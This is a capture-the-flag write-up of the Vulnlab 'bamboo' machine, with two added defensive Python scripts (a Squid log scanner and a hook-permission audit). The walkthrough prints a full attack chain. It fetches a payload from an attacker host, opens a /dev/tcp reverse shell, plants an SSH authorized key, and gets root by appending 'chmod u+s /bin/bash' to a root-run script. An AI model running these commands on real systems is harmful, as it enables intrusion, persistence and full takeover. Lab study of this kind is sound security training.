vulnlab-bamboo

vulnlab bamboo

nmap scan

# Nmap 7.93 scan initiated Wed Jul 31 08:34:44 2024 as: nmap -Pn -oN bamboo.nmap 10.10.79.83
Nmap scan report for bamboo.vl (10.10.79.83)
Host is up (0.020s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
3128/tcp open  squid-http

# Nmap done at Wed Jul 31 08:34:52 2024 -- 1 IP address (1 host up) scanned in 8.12 seconds

Port scan through the Squid proxy with squidscan

┌──(puck㉿kali)-[~/vulnlab/bamboo/squidscan]
└─$ ./squidscan                     
Port 22 found!
Port 9192 found!
Port 9195 found!
Port 9173 found!
Port 9174 found!
Port 9191 found!
65532 / 65535 [---------------------------------------------------->] 100.00% 0 p/s


modified the proxychains config (/etc/proxychains4.conf) so traffic is routed through the Squid proxy

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 	127.0.0.1 9050
#socks5 127.0.0.1 1080
http 10.10.79.83 3128


┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ curl --proxy http://10.10.79.83:3128 http://10.10.79.83:9191 -vv
*   Trying 10.10.79.83:3128...
* Connected to 10.10.79.83 (10.10.79.83) port 3128
> GET http://10.10.79.83:9191/ HTTP/1.1
> Host: 10.10.79.83:9191
> User-Agent: curl/8.8.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> 
* Request completely sent off
< HTTP/1.1 302 Found
< Date: Wed, 31 Jul 2024 06:40:17 GMT
< Location: http://10.10.79.83:9191/user
< Content-Length: 0
< X-Cache: MISS from bamboo
< X-Cache-Lookup: MISS from bamboo:3128
< Via: 1.1 bamboo (squid/5.2)
< Connection: keep-alive
< 
* Connection #0 to host 10.10.79.83 left intact

Exploiting CVE-2023-27350

wget https://raw.githubusercontent.com/horizon3ai/CVE-2023-27350/main/CVE-2023-27350.py


First run: stage the script on the target

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "curl http://10.8.2.138/s.sh -o /tmp/s.sh"
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

Second run: execute it

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "bash /tmp/s.sh" 
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

s.sh contains:

#!/bin/bash
sh -i >& /dev/tcp/10.8.2.138/9001 0>&1


catch the shell

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.79.83] 57168
sh: 0: can't access tty; job control turned off
$ id
uid=1001(papercut) gid=1001(papercut) groups=1001(papercut)
$ hostname
bamboo

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
papercut@bamboo:~/server$ export TERM=xterm
export TERM=xterm
papercut@bamboo:~/server$ 
zsh: suspended  rlwrap nc -nlvp 9001
┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 9001
papercut@bamboo:~/server$ ls
ls
bin     deployment   lib      reports                     server.uuid
custom  event-store  lib-ext  server.properties           tmp
data    examples     logs     server.properties.template  version.txt
papercut@bamboo:~/server$ 

Let's add our key to the authorized_keys file to get an SSH shell

papercut@bamboo:~$ mkdir .ssh
papercut@bamboo:~$ cd .ssh
papercut@bamboo:~/.ssh$ echo 'ssh-rsa AAAAC3N<redacted>QGB= puck@kali' > authorized_keys
papercut@bamboo:~/.ssh$

With the key in place we SSH in and run the usual linpeas and pspy enumeration on bamboo:

ssh -i papercut papercut@10.10.79.83


privesc

There is an authentication bypass script on Exploit-DB (https://www.exploit-db.com/exploits/51391) for the same CVE we started with.
Running it prints the steps to follow:

➜  bamboo python3 auth_bypass.py
Enter the ip address: 127.0.0.1
Version: 22.0.6
Vulnerable version
Step 1 visit this url first in your browser: http://127.0.0.1:9191/app?service=page/SetupCompleted
Step 2 visit this url in your browser to bypass the login page : http://127.0.0.1:9191/app?service=page/Dashboard
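A defender's view of the two things this walkthrough relies on (the open Squid proxy relaying requests to a port on its own host, and the SetupCompleted page used for the CVE-2023-27350 bypass): an added example, not from the original post or from Squid/PaperCut, that scans Squid native-format access.log lines for both. The log lines are constructed; the proxy address 10.10.79.83 and the PaperCut port 9191 are taken from the scan above.

```python
import re
from ipaddress import ip_address

# Squid native access.log: <epoch> <ms> <client> <code>/<status> <bytes> <method> <url> <user> <hier>/<peer> <type>
SQUID_LINE = re.compile(r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+\S+\s+(?P<url>\S+)")
URL = re.compile(r"^(?P<scheme>https?)://(?P<host>[^/:]+)(?::(?P<port>\d+))?(?P<path>/\S*)?$")

EXPECTED_PORTS = {80, 443}                          # normal web browsing through the proxy
SETUP_PAGE = "/app?service=page/SetupCompleted"     # PaperCut auth-bypass page (CVE-2023-27350)

def parse_line(line):
    """Return a dict for one Squid log line, or None if it does not parse."""
    m = SQUID_LINE.match(line)
    u = URL.match(m["url"]) if m else None
    if not u:
        return None
    port = int(u["port"]) if u["port"] else (443 if u["scheme"] == "https" else 80)
    return {"ts": float(m["ts"]), "client": m["client"], "host": u["host"],
            "port": port, "path": u["path"] or "/"}

def reasons_for(rec, proxy_host):
    """List why a proxied request looks like a pivot into the proxy host."""
    reasons = []
    if rec["port"] not in EXPECTED_PORTS:
        reasons.append(f"non-web destination port {rec['port']}")
    host = rec["host"]
    try:
        loopback = ip_address(host).is_loopback
    except ValueError:                     # hostname rather than an IP literal
        loopback = host == "localhost"
    if loopback or host == proxy_host:
        reasons.append("destination is the proxy host itself")
    if rec["path"].startswith(SETUP_PAGE):
        reasons.append("PaperCut SetupCompleted page requested")
    return reasons

def scan(lines, proxy_host):
    """Return (client, host, port, path, reasons) for every flagged request."""
    out = []
    for line in lines:
        rec = parse_line(line)
        if rec and (r := reasons_for(rec, proxy_host)):
            out.append((rec["client"], rec["host"], rec["port"], rec["path"], r))
    return out

# Constructed sample: a client at 10.8.2.138 uses the open proxy to reach PaperCut on the proxy host.
SAMPLE_LOG = """\
1722407000.101 45 10.8.2.138 TCP_MISS/200 5120 GET http://example.com/ - HIER_DIRECT/93.184.216.34 text/html
1722407017.220 12 10.8.2.138 TCP_MISS/302 320 GET http://10.10.79.83:9191/ - HIER_DIRECT/10.10.79.83 -
1722407030.512 30 10.8.2.138 TCP_MISS/200 8810 GET http://10.10.79.83:9191/app?service=page/SetupCompleted - HIER_DIRECT/10.10.79.83 text/html
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG, "10.10.79.83"):
        print(hit)
```

The same check belongs in the Squid config itself (a `to_localhost` deny and a tight `Safe_ports` list), but the log scan shows what an open proxy already leaked.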

The PaperCut NG instance runs on port 9191, so we forward that port over SSH:

ssh -i papercut papercut@10.10.79.83 -L 9191:127.0.0.1:9191 -N

Browse to the PaperCut admin interface through the forwarded port.

Clicking "Refresh servers" in the admin interface triggers the server-command script.


papercut@bamboo:~$ pwd
pwd
/home/papercut
papercut@bamboo:~$ cat user.txt
cat user.txt
VL{fb<redacted>c3}
papercut@bamboo:~$ 

papercut@bamboo:~/server/bin/linux-x64$ ls
ls
app-monitor                              pc-pdl-to-image
app-monitor.conf                         pc-split-scan
app-server                               pc-udp-redirect
authpam                                  roottasks
authsamba                                sambauserdir
create-client-config-file                server-command
create-ssl-keystore                      setperms
db-tools                                 start-server
direct-print-monitor-config-initializer  stduserdir
gather-ldap-settings                     stop-server
lib                                      upgrade-server-configuration
papercut@bamboo:~/server/bin/linux-x64$ echo 'chmod u+s /bin/bash' >> server-command

echo 'chmod u+s /bin/bash' >> server-command
papercut@bamboo:~/server/bin/linux-x64$ 
papercut@bamboo:~/server/bin/linux-x64$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash
papercut@bamboo:~/server/bin/linux-x64$ bash -p
bash -p
bash-5.1# cd /root
cd /root
bash-5.1# ls
ls
root.txt  snap
bash-5.1# cat root.txt
cat root.txt
VL{48<redacted>26}
bash-5.1# 
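The privilege escalation works because server-command, a script PaperCut runs with root privileges when an admin clicks "Refresh servers", can be appended to by the papercut account. As an added example (not the post's or PaperCut's own code), here is a small audit that walks a hook directory such as /home/papercut/server/bin/linux-x64 and reports files a less privileged user could alter; `demo_tree()` builds a constructed stand-in directory so it runs anywhere.

```python
import os
import stat
import tempfile

WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH

def unsafe_hooks(hook_dir, trusted_uid=0):
    """Return (path, reason) pairs for files under hook_dir that a less privileged
    account could modify even though a root-owned process will execute them."""
    findings = []
    dmode = os.stat(hook_dir).st_mode
    if dmode & WRITE_BITS and not dmode & stat.S_ISVTX:
        findings.append((hook_dir, "hook directory is group/world writable"))
    for root, _dirs, files in os.walk(hook_dir):
        for name in sorted(files):
            path = os.path.join(root, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                findings.append((path, "symlink: target may live in a writable location"))
                continue
            if st.st_uid != trusted_uid:
                findings.append((path, f"owned by uid {st.st_uid}, not trusted uid {trusted_uid}"))
            if st.st_mode & WRITE_BITS:
                findings.append((path, "group/world writable"))
    return findings

def owner_uid(path):
    """Owning uid of a file (helper so callers need not touch os directly)."""
    return os.stat(path).st_uid

def demo_tree():
    """Constructed stand-in for PaperCut's server/bin/linux-x64 directory (not real files):
    one script with sane permissions and one that the service group can write to."""
    d = tempfile.mkdtemp(prefix="pc-bin-")
    os.chmod(d, 0o755)
    paths = {}
    for name, mode in (("start-server", 0o755), ("server-command", 0o775)):
        p = os.path.join(d, name)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(p, mode)
        paths[name] = p
    return d, paths

if __name__ == "__main__":
    d, paths = demo_tree()
    for path, why in unsafe_hooks(d, trusted_uid=owner_uid(paths["start-server"])):
        print(path, "->", why)
```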

That’s all.
